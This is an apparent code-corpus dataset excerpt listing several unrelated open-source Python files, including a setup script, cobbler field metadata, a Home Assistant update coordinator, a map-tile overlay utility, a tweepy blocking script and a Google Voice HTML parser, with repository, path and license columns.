code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
#!/usr/bin/env python
from setuptools import setup, find_packages
# get requirements.txt
with open('requirements.txt') as f:
required = f.read().splitlines()
setup(name='athos-core',
description = 'Athos project core',
url = 'https://github.com/AthosOrg/',
packages = find_packages(),
entry_points = {
'console_scripts': [
'athos-core=athos.cmd:main'
]
},
install_requires = required,
package_data = {'athos': ['default.yml']}
) | AthosOrg/athos-core | setup.py | Python | mit | 491 |
"""
Describes additional properties of cobbler fields otherwise
defined in item_*.py. These values are common to all versions
of the fields, so they don't have to be repeated in each file.
Copyright 2009, Red Hat, Inc
Michael DeHaan <mdehaan@redhat.com>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301 USA
"""
# fields that display as a text area in the web app
# note: not the same as a text field, this is the big one.
USES_TEXTAREA = [
"comment",
"mgmt_classes",
"template_files"
]
# fields that use a multi select in the web app
USES_MULTI_SELECT = [
"repos"
]
# fields that use a select in the web app
USES_SELECT = [
"profile",
"distro",
"image",
"virt_type",
"arch",
"*bonding",
"parent",
"breed",
"os_version",
]
# fields that should use the checkbox in the web app
USES_CHECKBOX = [
"enable_menu",
"*netboot_enabled",
"netboot_enabled",
"*static",
"keep_updated",
"mirror_locally",
"virt_auto_boot"
]
# select killed the radio button
# we should not make anything use a radio button, we hate radio buttons.
USES_RADIO = [
]
# this is the map of what color to color code each field type.
# it may also be used to expand/collapse certain web elements as a set.
BLOCK_MAPPINGS = {
"virt_ram" : "Virtualization",
"virt_disk" : "Virtualization",
"virt_cpus" : "Virtualization",
"virt_bridge" : "Virtualization",
"virt_path" : "Virtualization",
"virt_file_size" : "Virtualization",
"virt_type" : "Virtualization",
"virt_auto_boot" : "Virtualization",
"virt_host" : "Virtualization",
"virt_group" : "Virtualization",
"virt_guests" : "Virtualization",
"*virt_ram" : "Virtualization",
"*virt_disk" : "Virtualization",
"*virt_path" : "Virtualization",
"*virt_cpus" : "Virtualization",
"*virt_bridge" : "Networking",
"*virt_type" : "Virtualization",
"*virt_file_size" : "Virtualization",
"power_id" : "Power",
"power_address" : "Power",
"power_user" : "Power",
"power_pass" : "Power",
"power_type" : "Power",
"address" : "Networking", # from network
"cidr" : "Networking", # ditto
"broadcast" : "Networking", # ..
"reserved" : "Networking", # ..
"*mac_address" : "Networking",
"*ip_address" : "Networking",
"*dhcp_tag" : "Networking",
"*static" : "Networking",
"*bonding" : "Networking",
"*bonding_opts" : "Networking",
"*bonding_master" : "Networking",
"*dns_name" : "Networking",
"*static_routes" : "Networking",
"*subnet" : "Networking",
"hostname" : "Networking (Global)",
"gateway" : "Networking (Global)",
"name_servers" : "Networking (Global)",
"name_servers_search" : "Networking (Global)",
"repos" : "General",
"dhcp_tag" : "Advanced",
"mgmt_classes" : "Management",
"template_files" : "Management",
"network_widget_a" : "Networking",
"network_widget_b" : "Networking",
"server" : "Advanced",
"redhat_management_key" : "Management",
"redhat_management_server" : "Management",
"createrepo_flags" : "Advanced",
"environment" : "Advanced",
"mirror_locally" : "Advanced",
"priority" : "Advanced",
"yumopts" : "Advanced"
}
# Certain legacy fields need to have different CLI options than the direct translation of their
# name in the FIELDS data structure. We should not add any more of these under any conditions.
ALTERNATE_OPTIONS = {
"ks_meta" : "--ksmeta",
"kernel_options" : "--kopts",
"kernel_options_post" : "--kopts-post",
}
| ssalevan/cobbler | cobbler/field_info.py | Python | gpl-2.0 | 4,454 |
# -*- coding: utf-8 -*-
import re
from ..base.decrypter import BaseDecrypter
class UlozToFolder(BaseDecrypter):
__name__ = "UlozToFolder"
__type__ = "decrypter"
__version__ = "0.27"
__status__ = "testing"
__pattern__ = r"http://(?:www\.)?(uloz\.to|ulozto\.(cz|sk|net)|bagruj\.cz|zachowajto\.pl)/(m|soubory)/.+"
__config__ = [
("enabled", "bool", "Activated", True),
("use_premium", "bool", "Use premium account if available", True),
(
"folder_per_package",
"Default;Yes;No",
"Create folder for each package",
"Default",
),
]
__description__ = """Uloz.to folder decrypter plugin"""
__license__ = "GPLv3"
__authors__ = [("zoidberg", "zoidberg@mujmail.cz")]
FOLDER_PATTERN = r'<ul class="profile_files">(.*?)</ul>'
LINK_PATTERN = r'<br /><a href="/(.+?)">.+?</a>'
NEXT_PAGE_PATTERN = r'<a class="next " href="/(.+?)"> </a>'
def decrypt(self, pyfile):
html = self.load(pyfile.url)
new_links = []
for i in range(1, 100):
self.log_info(self._("Fetching links from page {}").format(i))
m = re.search(self.FOLDER_PATTERN, html, re.S)
if m is None:
self.error(self._("FOLDER_PATTERN not found"))
new_links.extend(re.findall(self.LINK_PATTERN, m.group(1)))
m = re.search(self.NEXT_PAGE_PATTERN, html)
if m is not None:
html = self.load("http://ulozto.net/" + m.group(1))
else:
break
else:
self.log_info(self._("Limit of 99 pages reached, aborting"))
if new_links:
self.links = [["http://ulozto.net/{}".format(s) for s in new_links]]
| vuolter/pyload | src/pyload/plugins/decrypters/UlozToFolder.py | Python | agpl-3.0 | 1,771 |
__author__ = 'Pat McClernan and Dan Weggman'
#input
#0 for rock
#1 for paper
#2 for scissors
# past move is array of numbers
# our move followed by their move
#Our strategy is to look at all past moves
#In a large number of games, you would expect
# each move to be seen an even amount of times
#So our strategy is to take the least seen move
# and expect it to show up soon
# so we will play to beat that move
class my_rps_player:
def __init__(self):
rock = 0
paper = 0
scissors = 0
def my_rps_play(self):
rock = self.rock
paper = self.paper
scissors = self.scissors
#determine which move has been used least
if (rock < paper) and (rock < scissors):
move = 0
elif paper < scissors:
move = 1
else: move = 2
print(move)
move = (move + 1 )% 3
return move
def add_moves(self, moves):
for this_move in list(moves):
if this_move == 0:
self.rock += 1
elif this_move == 1:
self.paper += 1
elif this_move == 2:
self.scissors += 1
def reset_moves(self):
self.rock = 0
self.paper = 0
self.scissors = 0
| mccler89/RPS_Player | my_rps_player.py | Python | apache-2.0 | 1,272 |
#!/usr/bin/python
from datetime import datetime, timedelta
import httplib2
import os
import sys
import pandas as pd
from pprint import pprint as pp
from apiclient.discovery import build
from apiclient.errors import HttpError
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client.tools import argparser, run_flow
# The CLIENT_SECRETS_FILE variable specifies the name of a file that contains
# the OAuth 2.0 information for this application, including its client_id and
# client_secret. You can acquire an OAuth 2.0 client ID and client secret from
# the Google Developers Console at
# https://console.developers.google.com/.
# Please ensure that you have enabled the YouTube Data and YouTube Analytics
# APIs for your project.
# For more information about using OAuth2 to access the YouTube Data API, see:
# https://developers.google.com/youtube/v3/guides/authentication
# For more information about the client_secrets.json file format, see:
# https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
CLIENT_SECRETS_FILE = "client_secrets.json"
# These OAuth 2.0 access scopes allow for read-only access to the authenticated
# user's account for both YouTube Data API resources and YouTube Analytics Data.
YOUTUBE_SCOPES = ["https://www.googleapis.com/auth/youtube.readonly",
"https://www.googleapis.com/auth/yt-analytics.readonly"]
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
YOUTUBE_ANALYTICS_API_SERVICE_NAME = "youtubeAnalytics"
YOUTUBE_ANALYTICS_API_VERSION = "v1"
# This variable defines a message to display if the CLIENT_SECRETS_FILE is
# missing.
MISSING_CLIENT_SECRETS_MESSAGE = """
WARNING: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
with information from the Developers Console
https://console.developers.google.com/
For more information about the client_secrets.json file format, please visit:
https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
""" % os.path.abspath(os.path.join(os.path.dirname(__file__),
CLIENT_SECRETS_FILE))
def get_authenticated_services(args):
flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE,
scope=" ".join(YOUTUBE_SCOPES),
message=MISSING_CLIENT_SECRETS_MESSAGE)
storage = Storage("%s-oauth2.json" % sys.argv[0])
credentials = storage.get()
if credentials is None or credentials.invalid:
credentials = run_flow(flow, storage, args)
http = credentials.authorize(httplib2.Http())
youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
http=http)
youtube_analytics = build(YOUTUBE_ANALYTICS_API_SERVICE_NAME,
YOUTUBE_ANALYTICS_API_VERSION, http=http)
return (youtube, youtube_analytics)
def get_channel_id(youtube):
channels_list_response = youtube.channels().list(
mine=True,
part="id"
).execute()
return channels_list_response["items"][0]["id"]
def run_analytics_report(youtube_analytics, channel_id, options):
# Call the Analytics API to retrieve a report. For a list of available
# reports, see:
# https://developers.google.com/youtube/analytics/v1/channel_reports
analytics_query_response = youtube_analytics.reports().query(
ids="channel==%s" % channel_id,
metrics=options.metrics,
dimensions=options.dimensions,
start_date=options.start_date,
end_date=options.end_date,
max_results=options.max_results,
sort=options.sort
).execute()
print "Analytics Data for Channel %s" % channel_id
pp(analytics_query_response)
headers = analytics_query_response.get("columnHeaders",[])
analytics_results = analytics_query_response.get("rows")
pp(analytics_results)
pp(headers)
return analytics_results, headers
# for column_header in analytics_query_response.get("columnHeaders", []):
# print "%-20s" % column_header["name"],
# print
#
# for row in analytics_query_response.get("rows", []):
# for value in row:
# print "%-20s" % value,
# print
if __name__ == "__main__":
now = datetime.now()
start = (now - timedelta(days=150)).strftime("%Y-%m-%d")
end = (now - timedelta(days=1)).strftime("%Y-%m-%d")
argparser.add_argument("--metrics", help="Report metrics",
default="views,averageViewDuration,averageViewPercentage")
argparser.add_argument("--dimensions", help="Report dimensions",
default="subscribedStatus")
argparser.add_argument("--start-date", default=start,
help="Start date, in YYYY-MM-DD format")
argparser.add_argument("--end-date", default=end,
help="End date, in YYYY-MM-DD format")
argparser.add_argument("--max-results", help="Max results", default=90)
argparser.add_argument("--sort", help="Sort order", default="-views")
args = argparser.parse_args()
(youtube, youtube_analytics) = get_authenticated_services(args)
try:
channel_id = get_channel_id(youtube)
analytics_results, headers = run_analytics_report(youtube_analytics, channel_id, args)
df_total_views = pd.DataFrame(analytics_results,columns=["views","averageViewDuration","averageViewPercentage"])
# df_total_views.loc[:,"netSubscribers"] = df_total_views["subscribersGained"] - df_total_views["subscribersLost"]
df_total_views.loc[:,"totalWatchTime"] = df_total_views["views"]*df_total_views["averageViewDuration"]
# df_total_views.set_index("date",inplace=True)
df_total_views.to_csv("Youtube Net Subscribers.csv")
except HttpError, e:
print "An HTTP error %d occurred:\n%s" % (e.resp.status, e.content)
| facemelters/data-science | Atlas/test-youtube.py | Python | gpl-2.0 | 5,599 |
# (C) British Crown Copyright 2010 - 2016, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
# Import Iris tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
from .extest_util import (add_examples_to_path,
show_replaced_by_check_graphic,
fail_any_deprecation_warnings)
class TestCOPMaps(tests.GraphicsTest):
"""Test the COP_maps example code."""
def test_cop_maps(self):
with fail_any_deprecation_warnings():
with add_examples_to_path():
import COP_maps
with show_replaced_by_check_graphic(self):
COP_maps.main()
if __name__ == '__main__':
tests.main()
| QuLogic/iris | docs/iris/example_tests/test_COP_maps.py | Python | gpl-3.0 | 1,504 |
# -*- coding: utf-8 -*-
"""Overlay / Underlay an image or a geo referenced map to mpl.axes"""
import os
import math
import random
import matplotlib.image as mpimg
import numpy as np
import urllib
class OverlayImageMPL(object):
"""What is this?"""
def __init__(self, imageFileName, axes):
self.axes = axes
self.imAxes = None
self.image = mpimg.open(imageFileName)
self.figure = self.axes.get_figure()
def clear(self):
"""What is this?"""
if self.imAxes in self.figure.axes:
self.figure.delaxes(self.imAxes)
def setPosition(self, posX, posY, axes=None):
"""What is this?"""
if axes is not None:
self.axes = axes
self.dx = float(self.image.size[0]) / \
self.figure.get_dpi() / self.figure.get_size_inches()[0]
self.dy = float(self.image.size[0]) / \
self.figure.get_dpi() / self.figure.get_size_inches()[1]
xRange = self.axes.get_xlim()[1] - self.axes.get_xlim()[0]
yRange = self.axes.get_ylim()[1] - self.axes.get_ylim()[0]
x = (posX - self.axes.get_xlim()[0]) / xRange
y = (posY - self.axes.get_ylim()[0]) / yRange
x *= (self.axes.get_position().x1 - self.axes.get_position().x0)
y *= (self.axes.get_position().y1 - self.axes.get_position().y0)
# print self.imAxes
# print self.figure.axes
if self.imAxes not in self.figure.axes:
if (x + self.axes.get_position().x0) > 10:
print(("overlay size out of range",
(x + self.axes.get_position().x0)))
print((posX, posY))
print((xRange, yRange))
print((x, y))
print((self.axes.get_position().x0,
self.axes.get_position().x1))
print((self.figure.get_size_inches()))
print(("add axes",
[x + self.axes.get_position().x0 - self.dx / 6.0,
y + self.axes.get_position().y0, self.dx, self.dy]))
# hackish
return
self.imAxes = self.figure.add_axes([
x + self.axes.get_position().x0 - self.dx / 6.0,
y + self.axes.get_position().y0,
self.dx, self.dy],
frameon=False, axisbg='y')
else:
self.imAxes.set_position([
x + self.axes.get_position().x0 - self.dx / 6.0,
y + self.axes.get_position().y0,
self.dx, self.dy])
if (len(self.imAxes.get_xticks()) > 0):
print("overlay imshow")
self.imAxes.imshow(self.image, origin='lower')
self.imAxes.set_xticks([])
self.imAxes.set_yticks([])
def deg2MapTile(lon_deg, lat_deg, zoom):
"""What is this?"""
lat_rad = math.radians(lat_deg)
n = 2.0 ** zoom
xtile = int((lon_deg + 180.0) / 360.0 * n)
ytile = int((1.0 - math.log(math.tan(lat_rad) +
(1 / math.cos(lat_rad))) / math.pi) / 2.0 * n)
return (xtile, ytile)
def mapTile2deg(xtile, ytile, zoom):
"""
Returns the NW-corner of the square.
Use the function with xtile+1 and/or ytile+1 to get the other corners.
With xtile+0.5 ytile+0.5 it will return the center of the tile.
"""
n = 2.0 ** zoom
lon_deg = xtile / n * 360.0 - 180.0
lat_rad = math.atan(math.sinh(math.pi * (1 - 2 * ytile / n)))
lat_deg = math.degrees(lat_rad)
return (lon_deg, lat_deg)
def cacheFileName(fullname, vendor):
""" Utility. Createfilename and path to cache download data."""
(dirName, fileName) = os.path.split(fullname)
path = './' + vendor + '/' + dirName
try:
os.makedirs(path)
except OSError:
pass
return path + '/' + fileName
def getMapTile(xtile, ytile, zoom, vendor='OSM', verbose=False):
"""
Get a map tile from public mapping server.
Parameters
----------
xtile : int
ytile : int
zoom : int
vendor : str
. 'OSM' or 'Open Street Map' (tile.openstreetmap.org)
. 'GM' or 'Google Maps' (mt.google.com)
verbose : bool [false]
be verbose
"""
imagename = str(zoom) + '/' + str(xtile) + '/' + str(ytile)
if vendor == 'OSM' or vendor == 'Open Street Map':
# http://[abc].tile.openstreetmap.org
serverName = 'tile.openstreetmap.org'
url = 'http://a.' + serverName + '/' + imagename + '.png'
imFormat = '.png'
elif vendor == 'GM' or vendor == 'Google Maps':
# http://mt1.google.com/vt/x=70389&s=&y=43016&z=17
# http://mt.google.com/vt/x=70389&s=&y=43016&z
serverName = 'mt.google.com'
nr = random.randint(0, 3)
url = 'http://mt' + str(nr) + '.google.com/vt/x=' + \
str(xtile) + '&y=' + str(ytile) + '&z=' + str(zoom)
imFormat = '.png'
elif vendor == 'GMS' or vendor == 'Google Maps Satellite':
serverName = 'khm.google.com'
nr = random.randint(0, 3)
url = 'http://khm' + str(nr) + '.google.com/kh/v=60&x=' + \
str(xtile) + '&y=' + str(ytile) + '&z=' + str(zoom)
imFormat = '.jpeg'
# http://khm0.google.com/kh/v=60&x=2197&y=1346&z=12
else:
raise "Vendor: " + vendor + \
" not supported (currently only OSM (Open Street Map))"
filename = cacheFileName(imagename, serverName) + imFormat
if os.path.exists(filename):
if verbose:
print(("Read image from disk", filename))
image = mpimg.imread(filename)
else:
if verbose:
print(("Get map from url maps", url))
opener1 = urllib.request.build_opener()
filehandle = opener1.open(url, timeout=15)
data = filehandle.read()
opener1.close()
if verbose:
print(imagename)
fi = open(filename, 'w')
fi.write(data)
fi.close()
image = mpimg.imread(filename)
if imFormat == '.jpeg':
image = image[::-1, ...] / 256.
return image
# def getMapTile(...)
def underlayMap(axes, proj, vendor='OSM', zoom=-1, pixelLimit=None,
verbose=False, fitMap=False):
"""
Get a map from public mapping server and underlay it on the given axes
Parameters
----------
axes : matplotlib.axes
proj : pyproy
Proj Projection
vendor : str
. 'OSM' or 'Open Street Map' (tile.openstreetmap.org)
. 'GM' or 'Google Maps' (mt.google.com)
zoom : int [-1]
Zoom level. If zoom is set to -1, the pixel size of the resulting
image is lower than pixelLimit.
pixelLimit : [int,int]
verbose : bool [false]
be verbose
fitMap : bool
The axes is resized to fit the whole map.
"""
if pixelLimit is None:
pixelLimit = [1024, 1024]
origXLimits = axes.get_xlim()
origYLimits = axes.get_ylim()
ul = proj(axes.get_xlim()[0], axes.get_ylim()[1], inverse=True)
lr = proj(axes.get_xlim()[1], axes.get_ylim()[0], inverse=True)
if zoom == -1:
nXtiles = 1e99
nYtiles = 1e99
zoom = 19
while ((nYtiles * 256) > pixelLimit[0] or
(nXtiles * 256) > pixelLimit[1]):
zoom = zoom - 1
startTile = deg2MapTile(ul[0], ul[1], zoom)
endTile = deg2MapTile(lr[0], lr[1], zoom)
nXtiles = (endTile[0] - startTile[0]) + 1
nYtiles = (endTile[1] - startTile[1]) + 1
if verbose:
print(("tiles: ", zoom, nYtiles, nXtiles))
if nXtiles == 1 and nYtiles == 1:
break
if verbose:
print(("zoom set to ", zoom))
startTile = deg2MapTile(ul[0], ul[1], zoom)
endTile = deg2MapTile(lr[0], lr[1], zoom)
nXtiles = (endTile[0] - startTile[0]) + 1
nYtiles = (endTile[1] - startTile[1]) + 1
image = np.zeros(shape=(256 * nYtiles, 256 * nXtiles, 3))
if verbose:
print(("Mapimage size:", image.shape))
for i in range(nXtiles):
for j in range(nYtiles):
im = getMapTile(startTile[0] + i, startTile[1] + j,
zoom, vendor, verbose=verbose)
image[(j * 256): ((j + 1) * 256),
(i * 256): ((i + 1) * 256)] = im
lonLatStart = mapTile2deg(startTile[0], startTile[1], zoom)
lonLatEnd = mapTile2deg(endTile[0] + 1, endTile[1] + 1, zoom)
imUL = proj(lonLatStart[0], lonLatStart[1])
imLR = proj(lonLatEnd[0], lonLatEnd[1])
extent = np.asarray([imUL[0], imLR[0], imLR[1], imUL[1]])
axes.imshow(image, extent=extent)
if not fitMap:
axes.set_xlim(origXLimits)
axes.set_ylim(origYLimits)
| KristoferHellman/gimli | python/pygimli/mplviewer/overlayimage.py | Python | gpl-3.0 | 8,769 |
from lxml.html import parse
from datetime import datetime, timedelta
from message import GoogleVoiceMessage
def messagesFromHTML(htmlfile):
""" parse the contents of the folder
return a list of GoogleVoiceMessage objects
"""
def classContent(parent, cls):
"""
find the element inside parent with the given class,
and return the contents of that element,
with padding whitespace removed
"""
return parent.find_class(cls)[0].text_content().strip()
elBody = parse(htmlfile).getroot()
threads = elBody.find_class('gc-message')
msgs = []
# XXX extract my phone number from the page
me = "+15033088413"
me_name = "Me"
for elThread in threads:
thr = GoogleVoiceMessage()
# id
thr['thread_id'] = elThread.get('id')
# labels can be extracted from the classes applied to this element
thr['labels'] = []
for maybe_label in elThread.get('class').split():
if maybe_label.startswith('gc-message-'):
label = maybe_label[len('gc-message-'):]
thr['labels'].append(label)
# datestring is MM/DD/YY HH:MM [AP]M
# representing the *latest* message in the thread
datestr= classContent(elThread, 'gc-message-time')
thr['date'] = datetime.strptime(datestr, "%m/%d/%y %I:%M %p")
# name is in a 'nobold' span in 'gc-message-name'
thr['sender'] = classContent(elThread,'gc-message-name')
if 'sms' in thr['labels']:
### this is an SMS conversation.
elMessages = elThread.find_class('gc-message-sms-row')
for idx in range(len(elMessages)):
elMessage = elMessages[idx]
# assemble the message
msg = GoogleVoiceMessage({
'thread_id': thr['thread_id'],
'message_num': idx,
'labels': thr['labels'],
'sender': classContent(elMessage,
'gc-message-sms-from').strip(':'),
'content': classContent(elMessage,'gc-message-sms-text'),
})
# add the message date
# format is "HH:MM [AP]M"
timestr = classContent(elMessage,'gc-message-sms-time')
tm = datetime.strptime(timestr, "%H:%M %p")
msg['date'] = datetime.combine(thr['date'].date(), tm.time())
if tm.time() > thr['date'].time():
# this message is from a previous day
msg['date'] += timedelta(days=-1)
# figure out who this message is to
if msg['sender'] == me:
msg['recipient'] = thr.get('sender')
msg['recipient_name'] = thr.get('sender_name')
else:
msg['recipient'] = me
msg['recipient_name'] = me_name
msgs.append(msg)
else:
# incoming calls are always to me
thr['recipient'] = me
thr['recipient_name'] = me_name
try:
# a transcribed voice mail?
thr['content'] = classContent(elThread,'gc-edited-trans-text')
except IndexError:
# no...probably a missed call, then
thr['content'] = 'Missed call'
msgs.append(thr)
return msgs
| mglover/gvoice-python | parsers.py | Python | gpl-2.0 | 3,478 |
"""Helpers to help coordinate updates."""
import asyncio
from datetime import datetime, timedelta
import logging
from time import monotonic
from typing import Awaitable, Callable, Generic, List, Optional, TypeVar
import urllib.error
import aiohttp
import requests
from homeassistant.core import CALLBACK_TYPE, HomeAssistant, callback
from homeassistant.helpers import entity, event
from homeassistant.util.dt import utcnow
from .debounce import Debouncer
REQUEST_REFRESH_DEFAULT_COOLDOWN = 10
REQUEST_REFRESH_DEFAULT_IMMEDIATE = True
T = TypeVar("T")
class UpdateFailed(Exception):
"""Raised when an update has failed."""
class DataUpdateCoordinator(Generic[T]):
"""Class to manage fetching data from single endpoint."""
def __init__(
self,
hass: HomeAssistant,
logger: logging.Logger,
*,
name: str,
update_interval: Optional[timedelta] = None,
update_method: Optional[Callable[[], Awaitable[T]]] = None,
request_refresh_debouncer: Optional[Debouncer] = None,
):
"""Initialize global data updater."""
self.hass = hass
self.logger = logger
self.name = name
self.update_method = update_method
self.update_interval = update_interval
self.data: Optional[T] = None
self._listeners: List[CALLBACK_TYPE] = []
self._unsub_refresh: Optional[CALLBACK_TYPE] = None
self._request_refresh_task: Optional[asyncio.TimerHandle] = None
self.last_update_success = True
if request_refresh_debouncer is None:
request_refresh_debouncer = Debouncer(
hass,
logger,
cooldown=REQUEST_REFRESH_DEFAULT_COOLDOWN,
immediate=REQUEST_REFRESH_DEFAULT_IMMEDIATE,
function=self.async_refresh,
)
else:
request_refresh_debouncer.function = self.async_refresh
self._debounced_refresh = request_refresh_debouncer
@callback
def async_add_listener(self, update_callback: CALLBACK_TYPE) -> Callable[[], None]:
"""Listen for data updates."""
schedule_refresh = not self._listeners
self._listeners.append(update_callback)
# This is the first listener, set up interval.
if schedule_refresh:
self._schedule_refresh()
@callback
def remove_listener() -> None:
"""Remove update listener."""
self.async_remove_listener(update_callback)
return remove_listener
@callback
def async_remove_listener(self, update_callback: CALLBACK_TYPE) -> None:
"""Remove data update."""
self._listeners.remove(update_callback)
if not self._listeners and self._unsub_refresh:
self._unsub_refresh()
self._unsub_refresh = None
@callback
def _schedule_refresh(self) -> None:
"""Schedule a refresh."""
if self.update_interval is None:
return
if self._unsub_refresh:
self._unsub_refresh()
self._unsub_refresh = None
# We _floor_ utcnow to create a schedule on a rounded second,
# minimizing the time between the point and the real activation.
# That way we obtain a constant update frequency,
# as long as the update process takes less than a second
self._unsub_refresh = event.async_track_point_in_utc_time(
self.hass,
self._handle_refresh_interval,
utcnow().replace(microsecond=0) + self.update_interval,
)
async def _handle_refresh_interval(self, _now: datetime) -> None:
"""Handle a refresh interval occurrence."""
self._unsub_refresh = None
await self.async_refresh()
async def async_request_refresh(self) -> None:
"""Request a refresh.
Refresh will wait a bit to see if it can batch them.
"""
await self._debounced_refresh.async_call()
async def _async_update_data(self) -> Optional[T]:
"""Fetch the latest data from the source."""
if self.update_method is None:
raise NotImplementedError("Update method not implemented")
return await self.update_method()
async def async_refresh(self) -> None:
"""Refresh data."""
if self._unsub_refresh:
self._unsub_refresh()
self._unsub_refresh = None
self._debounced_refresh.async_cancel()
try:
start = monotonic()
self.data = await self._async_update_data()
except (asyncio.TimeoutError, requests.exceptions.Timeout):
if self.last_update_success:
self.logger.error("Timeout fetching %s data", self.name)
self.last_update_success = False
except (aiohttp.ClientError, requests.exceptions.RequestException) as err:
if self.last_update_success:
self.logger.error("Error requesting %s data: %s", self.name, err)
self.last_update_success = False
except urllib.error.URLError as err:
if self.last_update_success:
if err.reason == "timed out":
self.logger.error("Timeout fetching %s data", self.name)
else:
self.logger.error("Error requesting %s data: %s", self.name, err)
self.last_update_success = False
except UpdateFailed as err:
if self.last_update_success:
self.logger.error("Error fetching %s data: %s", self.name, err)
self.last_update_success = False
except NotImplementedError as err:
raise err
except Exception as err: # pylint: disable=broad-except
self.last_update_success = False
self.logger.exception(
"Unexpected error fetching %s data: %s", self.name, err
)
else:
if not self.last_update_success:
self.last_update_success = True
self.logger.info("Fetching %s data recovered", self.name)
finally:
self.logger.debug(
"Finished fetching %s data in %.3f seconds",
self.name,
monotonic() - start,
)
if self._listeners:
self._schedule_refresh()
for update_callback in self._listeners:
update_callback()
class CoordinatorEntity(entity.Entity):
"""A class for entities using DataUpdateCoordinator."""
def __init__(self, coordinator: DataUpdateCoordinator) -> None:
"""Create the entity with a DataUpdateCoordinator."""
self.coordinator = coordinator
@property
def should_poll(self) -> bool:
"""No need to poll. Coordinator notifies entity of updates."""
return False
@property
def available(self) -> bool:
"""Return if entity is available."""
return self.coordinator.last_update_success
async def async_added_to_hass(self) -> None:
"""When entity is added to hass."""
await super().async_added_to_hass()
self.async_on_remove(
self.coordinator.async_add_listener(self.async_write_ha_state)
)
async def async_update(self) -> None:
"""Update the entity.
Only used by the generic entity update service.
"""
# Ignore manual update requests if the entity is disabled
if not self.enabled:
return
await self.coordinator.async_request_refresh()
| tchellomello/home-assistant | homeassistant/helpers/update_coordinator.py | Python | apache-2.0 | 7,578 |
#!/usr/bin/env python
import os
import sys
import time
import tweepy
from tweepy import Cursor
from tweepy.binder import bind_api
from config import CONSUMER_KEY, CONSUMER_SECRET, ACCESS_TOKEN, ACCESS_TOKEN_SECRET
class SkippableAPI(tweepy.API):
"""Override the create_block function so that it accepts
the 'skip_status' option (ie. don't return the user from the command,
so that it returns faster."""
@property
def create_block(self):
""" :reference: https://dev.twitter.com/rest/reference/post/blocks/create
:allowed_param:'id', 'user_id', 'screen_name', 'skip_status'
"""
return bind_api(
api=self,
path='/blocks/create.json',
method='POST',
payload_type='user',
allowed_param=['id', 'user_id', 'screen_name', 'skip_status'],
require_auth=True)
@property
def blocks_ids(self):
""" :reference: https://dev.twitter.com/rest/reference/get/blocks/ids
:allowed_param:'cursor'"""
return bind_api(
api=self,
path='/blocks/ids.json',
payload_type='json',
allowed_param=['cursor'],
require_auth=True)
# Check parameters
print(sys.argv)
if len(sys.argv) != 3:
print("Bad tweet needs two values, the action and the url of the bad tweet.")
print("Something like:")
print(" $ python bad_tweet.py mute https://twitter.com/idiot/status/1234567890123456")
sys.exit(1)
action = sys.argv[-2]
if action not in ('mute', 'block'):
print("The first argument to bad tweet needs to be either 'mute' or 'block'")
sys.exit(2)
bad_tweet_url = sys.argv[-1]
if (not bad_tweet_url.startswith('http') or
'twitter.com' not in bad_tweet_url or
'status' not in bad_tweet_url):
print("The second argument doesn't seem to be a tweet url")
sys.exit(3)
# API setup
# wait on rate limit means wait if we're rate limited, ie. don't error out
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = SkippableAPI(
auth_handler=auth,
wait_on_rate_limit=True,
wait_on_rate_limit_notify=True)
# Find our account, build a whitelist of our followers so we don't mute them
"""
me = api.me()
whitelist = [me.id_str]
for followed in Cursor(api.friends).items():
whitelist.append(followed.id_str)
print "You are following %d people" % len(whitelist)
print whitelist
"""
bad_tweet_id = bad_tweet_url.split('/')[-1]
print(bad_tweet_id)
#for retweet in api.retweets(id=bad_tweet_id, trim_user=1, count=100):
# print retweet.author.id
for retweeter in api.retweeters(id=bad_tweet_id):
print(retweeter)
| AnthonyBriggs/Python-101 | bad_tweet/bad_tweet.py | Python | mit | 2,749 |
# -*- coding: utf-8 -*-
"""The Formatter Test Data model class."""
from plasoscaffolder.model import base_data_model
from plasoscaffolder.model import sql_query_model
class FormatterTestDataModel(base_data_model.BaseDataModel):
"""Class for the data for the formatter test template."""
def __init__(self,
plugin_name: str,
queries: [sql_query_model.SQLQueryModel]):
"""Initialises the formatter test data model.
Args:
plugin_name (str): the name of the plugin
queries (sql_query_model.SQLQueryModel): the queries
"""
super().__init__(plugin_name)
self.queries = queries
| ClaudiaSaxer/PlasoScaffolder | src/plasoscaffolder/model/formatter_test_data_model.py | Python | apache-2.0 | 640 |
{
'service_metadata': {
'service_name': 'iris',
'service_version': '0.1',
},
'dataset_loader_train': {
'!': 'palladium.R.DatasetLoader',
'scriptname': 'iris.R',
'funcname': 'dataset',
},
'dataset_loader_test': {
'!': 'palladium.R.DatasetLoader',
'scriptname': 'iris.R',
'funcname': 'dataset',
},
'model': {
'!': 'palladium.R.ClassificationModel',
